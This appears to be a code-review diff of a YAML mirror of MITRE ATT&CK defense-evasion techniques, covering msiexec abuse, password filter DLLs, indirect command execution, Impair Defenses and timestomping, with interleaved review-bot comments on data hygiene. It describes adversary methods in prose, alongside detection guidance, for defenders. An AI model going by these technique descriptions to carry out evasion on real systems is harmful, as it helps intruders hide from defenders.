x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- x_mitre_version: '1.2'
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'File: File Modification'
- 'Module: Module Load'
@@ -2525,6 +2591,10 @@ defense-evasion:
description: Harbour, N. (2011, June 3). What the fxsst?. Retrieved November
17, 2020.
url: https://www.fireeye.com/blog/threat-research/2011/06/fxsst.html
+ - source_name: Hexacorn DLL Hijacking
+ description: Hexacorn. (2013, December 8). Beyond good ol’ Run key, Part 5.
+ Retrieved August 14, 2024.
+ url: https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/
- source_name: Microsoft Security Advisory 2269637
description: Microsoft. (, May 23). Microsoft Security Advisory 2269637. Retrieved
March 13, 2020.
@@ -2552,12 +2622,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1574.001
atomic_tests: []
T1553.001:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-10-21T19:30:58.414Z'
name: 'Subvert Trust Controls: Gatekeeper Bypass'
description: |-
Adversaries may modify file attributes and subvert Gatekeeper functionality to evade user prompts and execute untrusted programs. Gatekeeper is a set of technologies that act as layer of Apple’s security model to ensure only trusted applications are executed on a host. Gatekeeper was built on top of File Quarantine in Snow Leopard (10.6, 2009) and has grown to include Code Signing, security policy compliance, Notarization, and more. Gatekeeper also treats applications running for the first time differently than reopened applications.(Citation: TheEclecticLightCompany Quarantine and the flag)(Citation: TheEclecticLightCompany apple notarization )
@@ -2653,7 +2722,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1553.001
atomic_tests: []
T1553.002:
@@ -2720,7 +2788,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1036.009:
technique:
@@ -2785,11 +2852,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1222.001:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:27:04.900Z'
name: 'File and Directory Permissions Modification: Windows File and Directory
Permissions Modification'
description: |-
@@ -2850,12 +2916,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1222.001
atomic_tests: []
T1574.014:
technique:
- modified: '2024-04-18T15:03:32.158Z'
+ modified: '2024-04-28T15:44:25.342Z'
name: AppDomainManager
description: "Adversaries may execute their own malicious payloads by hijacking
how the .NET `AppDomainManager` loads assemblies. The .NET framework uses
@@ -2881,7 +2946,7 @@ defense-evasion:
phase_name: defense-evasion
x_mitre_contributors:
- Thomas B
- - Ivy Bostock
+ - Ivy Drexel
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
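Review bot: a contributor's surname changes (Ivy Bostock to Ivy Drexel) with nothing else in the hunk. If this mirrors the upstream ATT&CK record it is fine; if it was hand-edited, it should carry a source, since contributor credits are attribution data that this file otherwise copies verbatim.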
@@ -2923,7 +2988,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1218.007:
technique:
@@ -2965,7 +3029,7 @@ defense-evasion:
Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi).(Citation: Microsoft msiexec) The Msiexec.exe binary may also be digitally signed by Microsoft.
Adversaries may abuse msiexec.exe to launch local or network accessible MSI files. Msiexec.exe can also execute DLLs.(Citation: LOLBAS Msiexec)(Citation: TrendMicro Msiexec Feb 2018) Since it may be signed and native on Windows systems, msiexec.exe can be used to bypass application control solutions that do not account for its potential abuse. Msiexec.exe execution may also be elevated to SYSTEM privileges if the AlwaysInstallElevated
policy is enabled.(Citation: Microsoft AlwaysInstallElevated 2018)
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-19T17:33:16.346Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Signed Binary Proxy Execution: Msiexec'
x_mitre_detection: Use process monitoring to monitor the execution and arguments
@@ -2988,36 +3052,11 @@ defense-evasion:
- Application control
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1218.007
atomic_tests: []
T1556.002:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Vincent Le Toux
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
- type: attack-pattern
- created: '2020-02-11T19:05:45.829Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1556.002
- url: https://attack.mitre.org/techniques/T1556/002
- - url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
- description: Fuller, R. (2013, September 11). Stealing passwords every time
- they change. Retrieved November 21, 2017.
- source_name: Carnal Ownage Password Filters Sept 2013
- - url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
- description: Bialek, J. (2013, September 15). Intercepting Password Changes
- With Function Hooking. Retrieved November 21, 2017.
- source_name: Clymb3r Function Hook Passwords Sept 2013
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-08-21T16:16:18.271Z'
name: 'Modify Authentication Process: Password Filter DLL'
description: "Adversaries may register malicious password filter dynamic link
libraries (DLLs) into the authentication process to acquire user credentials
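Review bot: the removed block is not deleted content; every field here (platforms, domains, contributors, marking refs, id, type, created, created_by_ref, external_references) reappears further down in the same T1556.002 object, so this hunk is a key reorder plus the `modified` bump to '2024-08-21T16:16:18.271Z'. The reorder also swaps the two citations (Carnal Ownage before Clymb3r becomes Clymb3r before Carnal Ownage). Consider emitting keys in a fixed order from the generator so that only the substantive changes show up as diff lines on the next refresh.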
@@ -3041,22 +3080,44 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_contributors:
+ - Vincent Le Toux
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer. Monitor for changes to Registry entries for password filters (ex: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages
) and correlate then investigate the DLL files these files reference.
Password filters will also show up as an autorun and loaded DLL in lsass.exe.(Citation: Clymb3r Function Hook Passwords Sept 2013)
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '2.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Modification'
- 'File: File Creation'
- 'Module: Module Load'
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
+ created: '2020-02-11T19:05:45.829Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1556/002
+ external_id: T1556.002
+ - source_name: Clymb3r Function Hook Passwords Sept 2013
+ description: Bialek, J. (2013, September 15). Intercepting Password Changes
+ With Function Hooking. Retrieved November 21, 2017.
+ url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
+ - source_name: Carnal Ownage Password Filters Sept 2013
+ description: Fuller, R. (2013, September 11). Stealing passwords every time
+ they change. Retrieved November 21, 2017.
+ url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1556.002
atomic_tests: []
T1070.007:
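Review bot: `x_mitre_permissions_required` (Administrator, SYSTEM) is removed from T1556.002 and nothing replaces it, so any consumer that filters tests by required privilege loses that signal for this technique. Confirm this follows the upstream record (version 2.0 to 2.1, attack spec 2.1.0 to 3.2.0, and `revoked: false` / `x_mitre_deprecated: false` newly emitted all point that way) rather than a field the generator stopped copying. Also, the unchanged detection text has a stray line break before `) and correlate`, which splits the registry path `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages` mid-sentence; worth cleaning while this block is being rewritten.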
@@ -3131,7 +3192,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1600.001:
technique:
@@ -3157,7 +3217,7 @@ defense-evasion:
url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
description: Omar Santos. (2020, October 19). Attackers Continue to Target
Legacy Devices. Retrieved October 20, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-21T22:36:22.369Z'
name: Reduce Key Space
description: |-
Adversaries may reduce the level of effort required to decrypt data transmitted over the network by reducing the cipher strength of encrypted communications.(Citation: Cisco Synful Knock Evolution)
@@ -3180,8 +3240,6 @@ defense-evasion:
- 'File: File Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1070.003:
technique:
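Review bot: for T1600.001 both `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` are removed and, unlike T1556.002 or T1202 where the attack spec version is re-emitted elsewhere in the object at 3.2.0, no replacement is visible in this hunk or in the preceding hunk for the same technique. Check that the record still carries an `x_mitre_attack_spec_version`; otherwise this technique becomes the odd one out for any tooling that keys on that field. The same pair of removals appears for T1055.003 later in this patch.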
@@ -3277,65 +3335,75 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1070.003
atomic_tests: []
T1202:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
+ modified: '2024-10-03T14:47:17.154Z'
+ name: Indirect Command Execution
+ description: |-
+ Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters. Various Windows utilities may be used to execute commands, possibly without invoking [cmd](https://attack.mitre.org/software/S0106). For example, [Forfiles](https://attack.mitre.org/software/S0193), the Program Compatibility Assistant (pcalua.exe), components of the Windows Subsystem for Linux (WSL), Scriptrunner.exe, as well as other utilities may invoke the execution of programs and commands from a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), Run window, or via scripts.(Citation: VectorSec ForFiles Aug 2017)(Citation: Evi1cg Forfiles Nov 2017)(Citation: Secure Team - Scriptrunner.exe)(Citation: SS64)(Citation: Bleeping Computer - Scriptrunner.exe)
+
+ Adversaries may abuse these features for [Defense Evasion](https://attack.mitre.org/tactics/TA0005), specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as Group Policy) that limit/prevent the usage of [cmd](https://attack.mitre.org/software/S0106) or file extensions more commonly associated with malicious payloads.
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
x_mitre_contributors:
- Matthew Demaske, Adaptforward
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ - Liran Ravich, CardinalOps
+ x_mitre_deprecated: false
+ x_mitre_detection: 'Monitor and analyze logs from host-based detection mechanisms,
+ such as Sysmon, for events such as process creations that include or are resulting
+ from parameters associated with invoking programs/commands/files and/or spawning
+ child processes/network connections. (Citation: RSA Forfiles Aug 2017)'
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.2'
+ x_mitre_data_sources:
+ - 'Command: Command Execution'
+ - 'Process: Process Creation'
+ x_mitre_defense_bypassed:
+ - Static File Analysis
+ - Application Control
type: attack-pattern
id: attack-pattern--3b0e52ce-517a-4614-a523-1bd5deef6c5e
created: '2018-04-18T17:59:24.739Z'
- x_mitre_version: '1.1'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1202
url: https://attack.mitre.org/techniques/T1202
+ external_id: T1202
+ - source_name: Bleeping Computer - Scriptrunner.exe
+ description: Bill Toulas. (2023, January 4). Hackers abuse Windows error reporting
+ tool to deploy malware. Retrieved July 8, 2024.
+ url: https://www.bleepingcomputer.com/news/security/hackers-abuse-windows-error-reporting-tool-to-deploy-malware/
- source_name: Evi1cg Forfiles Nov 2017
- url: https://twitter.com/Evi1cg/status/935027922397573120
description: Evi1cg. (2017, November 26). block cmd.exe ? try this :. Retrieved
- January 22, 2018.
+ September 12, 2024.
+ url: https://x.com/Evi1cg/status/935027922397573120
- source_name: RSA Forfiles Aug 2017
- url: https://community.rsa.com/community/products/netwitness/blog/2017/08/14/are-you-looking-out-for-forfilesexe-if-you-are-watching-for-cmdexe
description: Partington, E. (2017, August 14). Are you looking out for forfiles.exe
(if you are watching for cmd.exe). Retrieved January 22, 2018.
+ url: https://community.rsa.com/community/products/netwitness/blog/2017/08/14/are-you-looking-out-for-forfilesexe-if-you-are-watching-for-cmdexe
+ - source_name: Secure Team - Scriptrunner.exe
+ description: Secure Team - Information Assurance. (2023, January 8). Windows
+ Error Reporting Tool Abused to Load Malware. Retrieved July 8, 2024.
+ url: https://secureteam.co.uk/2023/01/08/windows-error-reporting-tool-abused-to-load-malware/
+ - source_name: SS64
+ description: SS64. (n.d.). ScriptRunner.exe. Retrieved July 8, 2024.
+ url: https://ss64.com/nt/scriptrunner.html
- source_name: VectorSec ForFiles Aug 2017
- url: https://twitter.com/vector_sec/status/896049052642533376
description: vector_sec. (2017, August 11). Defenders watching launches of
- cmd? What about forfiles?. Retrieved January 22, 2018.
- x_mitre_deprecated: false
- revoked: false
- description: |-
- Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters. Various Windows utilities may be used to execute commands, possibly without invoking [cmd](https://attack.mitre.org/software/S0106). For example, [Forfiles](https://attack.mitre.org/software/S0193), the Program Compatibility Assistant (pcalua.exe), components of the Windows Subsystem for Linux (WSL), as well as other utilities may invoke the execution of programs and commands from a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), Run window, or via scripts. (Citation: VectorSec ForFiles Aug 2017) (Citation: Evi1cg Forfiles Nov 2017)
-
- Adversaries may abuse these features for [Defense Evasion](https://attack.mitre.org/tactics/TA0005), specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as Group Policy) that limit/prevent the usage of [cmd](https://attack.mitre.org/software/S0106) or file extensions more commonly associated with malicious payloads.
- modified: '2022-05-24T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Indirect Command Execution
- x_mitre_detection: 'Monitor and analyze logs from host-based detection mechanisms,
- such as Sysmon, for events such as process creations that include or are resulting
- from parameters associated with invoking programs/commands/files and/or spawning
- child processes/network connections. (Citation: RSA Forfiles Aug 2017)'
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: defense-evasion
- x_mitre_is_subtechnique: false
- x_mitre_data_sources:
- - 'Command: Command Execution'
- - 'Process: Process Creation'
- x_mitre_defense_bypassed:
- - Static File Analysis
- - Application Control
- x_mitre_attack_spec_version: 2.1.0
+ cmd? What about forfiles?. Retrieved September 12, 2024.
+ url: https://x.com/vector_sec/status/896049052642533376
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1202
atomic_tests: []
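Review bot: the substantive changes in this hunk are easy to miss under the reorder: the description gains Scriptrunner.exe with three new citations (Bleeping Computer, Secure Team, SS64), Liran Ravich is added as a contributor, `x_mitre_version` goes 1.1 to 1.2, and the two twitter.com citation URLs move to x.com with September 2024 retrieval dates. The removed lines are otherwise the same fields re-emitted in a different order, and the Sysmon detection text is unchanged apart from position. One thing to confirm is that the Evi1cg citation text 'block cmd.exe ? try this :' is meant to be carried over verbatim, spaces before punctuation included. As with T1556.002, a stable key order in the generator would keep future refreshes reviewable.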
T1140:
@@ -3402,22 +3470,24 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1140
atomic_tests: []
T1562:
technique:
- modified: '2023-10-20T16:43:53.391Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Impair Defenses
- description: |-
+ description: |+
Adversaries may maliciously modify components of a victim environment in order to hinder or disable defensive mechanisms. This not only involves impairing preventative defenses, such as firewalls and anti-virus, but also detection capabilities that defenders can use to audit activity and identify malicious behavior. This may also span both native defenses as well as supplemental capabilities installed by users and administrators.
- Adversaries may also impair routine operations that contribute to defensive hygiene, such as blocking users from logging out of a computer or stopping it from being shut down. These restrictions can further enable malicious operations as well as the continued propagation of incidents.(Citation: Emotet shutdown)
+ Adversaries may also impair routine operations that contribute to defensive hygiene, such as blocking users from logging out, preventing a system from shutting down, or disabling or modifying the update process. Adversaries could also target event aggregation and analysis mechanisms, or otherwise disrupt these procedures by altering other system components. These restrictions can further enable malicious operations as well as the continued propagation of incidents.(Citation: Google Cloud Mandiant UNC3886 2024)(Citation: Emotet shutdown)
- Adversaries could also target event aggregation and analysis mechanisms, or otherwise disrupt these procedures by altering other system components.
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_contributors:
+ - Jamie Williams (U ω U), PANW Unit 42
+ - Liran Ravich, CardinalOps
x_mitre_deprecated: false
x_mitre_detection: |-
Monitor processes and command-line arguments to see if security tools or logging services are killed or stop running. Monitor Registry edits for modifications to services and startup programs that correspond to security tools. Lack of log events may be suspicious.
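Review bot: the description block scalar changes from `|-` (strip) to `|+` (keep), which changes the string value and not just its layout: `|+` preserves every trailing newline of the block, so the T1562 description now ends in one or more line feeds where the old value did not. If that is an artefact of the upstream text carrying a trailing blank line, normalise to `|-` in the generator; otherwise any consumer that compares or hashes description text will see a spurious change on every technique this happens to. Content-wise the merge of the two short paragraphs and the new UNC3886 citation read correctly, and the Emotet citation is kept.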
@@ -3426,15 +3496,17 @@ defense-evasion:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Office 365
- IaaS
- Linux
- macOS
- Containers
- Network
- x_mitre_version: '1.5'
+ - Identity Provider
+ - Office Suite
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'File: File Modification'
- 'Cloud Service: Cloud Service Disable'
@@ -3472,15 +3544,17 @@ defense-evasion:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1562
external_id: T1562
+ - source_name: Google Cloud Mandiant UNC3886 2024
+ description: " Punsaen Boonyakarn, Shawn Chew, Logeswaran Nadarajan, Mathew
+ Potaczek, Jakub Jozwiak, and Alex Marvi. (2024, June 18). Cloaked and Covert:
+ Uncovering UNC3886 Espionage Operations. Retrieved September 24, 2024."
+ url: https://cloud.google.com/blog/topics/threat-intelligence/uncovering-unc3886-espionage-operations
- source_name: Emotet shutdown
description: The DFIR Report. (2022, November 8). Emotet Strikes Again – LNK
File Leads to Domain Wide Ransomware. Retrieved March 6, 2023.
url: https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1562
atomic_tests: []
T1055.003:
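Review bot: the new `Google Cloud Mandiant UNC3886 2024` reference has a leading space inside its quoted description (`" Punsaen Boonyakarn, ...`). Because the value is double-quoted, that space is part of the string and will render as a leading blank in any citation list; strip it at generation time or fix it in the source. The move of `x_mitre_attack_spec_version` and `x_mitre_modified_by_ref` out of this position matches their re-emission earlier in the same object.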
@@ -3504,7 +3578,7 @@ defense-evasion:
A Technical Survey Of Common And Trending Process Injection Techniques.
Retrieved December 7, 2017.'
source_name: Elastic Process Injection July 2017
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T12:22:50.800Z'
name: Thread Execution Hijacking
description: "Adversaries may inject malicious code into hijacked processes
in order to evade process-based defenses as well as possibly elevate privileges.
@@ -3552,13 +3626,11 @@ defense-evasion:
- Anti-virus
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1055.003
atomic_tests: []
T1036:
technique:
- modified: '2024-03-08T17:00:59.133Z'
+ modified: '2024-10-16T20:10:38.450Z'
name: Masquerading
description: |-
Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
@@ -3574,7 +3646,7 @@ defense-evasion:
- Felipe Espósito, @Pr0teus
- Elastic
- Bartosz Jerzman
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: |-
Collect file hashes; file names that do not match their expected hash are suspect. Perform file monitoring; files with known names but in unusual locations are suspect. Likewise, files that are modified outside of an update or patch are suspect.
@@ -3599,6 +3671,7 @@ defense-evasion:
- 'Process: Process Creation'
- 'Image: Image Metadata'
- 'Scheduled Job: Scheduled Job Metadata'
+ - 'User Account: User Account Creation'
- 'File: File Metadata'
- 'Scheduled Job: Scheduled Job Modification'
- 'Command: Command Execution'
@@ -3616,8 +3689,8 @@ defense-evasion:
external_id: T1036
- source_name: Twitter ItsReallyNick Masquerading Update
description: Carr, N.. (2018, October 25). Nick Carr Status Update Masquerading.
- Retrieved April 22, 2019.
- url: https://twitter.com/ItsReallyNick/status/1055321652777619457
+ Retrieved September 12, 2024.
+ url: https://x.com/ItsReallyNick/status/1055321652777619457
- source_name: Elastic Masquerade Ball
description: 'Ewing, P. (2016, October 31). How to Hunt: The Masquerade Ball.
Retrieved October 31, 2016.'
@@ -3630,12 +3703,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1036
atomic_tests: []
T1070.008:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T15:43:56.839Z'
name: 'Email Collection: Mailbox Manipulation'
description: "Adversaries may modify mail and mail application data to remove
evidence of their activity. Email applications allow users and other programs
@@ -3672,9 +3744,8 @@ defense-evasion:
- Linux
- macOS
- Windows
- - Office 365
- - Google Workspace
- x_mitre_version: '1.1'
+ - Office Suite
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'File: File Deletion'
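Review bot: the T1070.008 platform list drops both `Office 365` and `Google Workspace` in favour of a single `Office Suite` entry, and T1562 earlier in this patch drops `Office 365` while gaining `Identity Provider` and `Office Suite`. Any index or filter in this repository that is built per platform by matching the old names will silently lose these techniques unless it is updated to the new platform names in the same change; check the generated per-platform indexes alongside this file.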
@@ -3712,14 +3783,13 @@ defense-evasion:
url: https://www.microsoft.com/en-us/security/blog/2022/09/22/malicious-oauth-applications-used-to-compromise-email-servers-and-spread-spam/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1070.008
atomic_tests: []
T1055:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:45.488Z'
name: Process Injection
description: "Adversaries may inject code into processes in order to evade process-based
defenses as well as possibly elevate privileges. Process injection is a method
@@ -3822,12 +3892,11 @@ defense-evasion:
url: http://www.chokepoint.net/2014/02/detecting-userland-preload-rootkits.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1055
atomic_tests: []
T1205:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-10-19T23:08:40.603Z'
name: Traffic Signaling
description: |-
Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use of a magic value or sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task. This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://attack.mitre.org/techniques/T1205/001)), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software.
@@ -3911,7 +3980,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1218:
technique:
@@ -3978,60 +4046,77 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1218
atomic_tests: []
T1070.006:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Romain Dumont, ESET
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--47f2d673-ca62-47e9-929b-1b0be9657611
- type: attack-pattern
- created: '2020-01-31T12:42:44.103Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1070.006
- url: https://attack.mitre.org/techniques/T1070/006
- - url: http://windowsir.blogspot.com/2013/07/howto-determinedetect-use-of-anti.html
- description: 'Carvey, H. (2013, July 23). HowTo: Determine/Detect the use
- of Anti-Forensics Techniques. Retrieved June 3, 2016.'
- source_name: WindowsIR Anti-Forensic Techniques
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2024-09-30T15:14:56.021Z'
name: 'Indicator Removal on Host: Timestomp'
description: |-
- Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
+ Adversaries may modify file time attributes to hide new files or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder and blend malicious files with legitimate files.
+
+ Both the `$STANDARD_INFORMATION` (`$SI`) and `$FILE_NAME` (`$FN`) attributes record times in a Master File Table (MFT) file.(Citation: Inversecos Timestomping 2022) `$SI` (dates/time stamps) is displayed to the end user, including in the File System view, while `$FN` is dealt with by the kernel.(Citation: Magnet Forensics)
+
+ Modifying the `$SI` attribute is the most common method of timestomping because it can be modified at the user level using API calls. `$FN` timestomping, however, typically requires interacting with the system kernel or moving or renaming a file.(Citation: Inversecos Timestomping 2022)
+
+ Adversaries modify timestamps on files so that they do not appear conspicuous to forensic investigators or file analysis tools. In order to evade detections that rely on identifying discrepancies between the `$SI` and `$FN` attributes, adversaries may also engage in “double timestomping” by modifying times on both attributes simultaneously.(Citation: Double Timestomping)
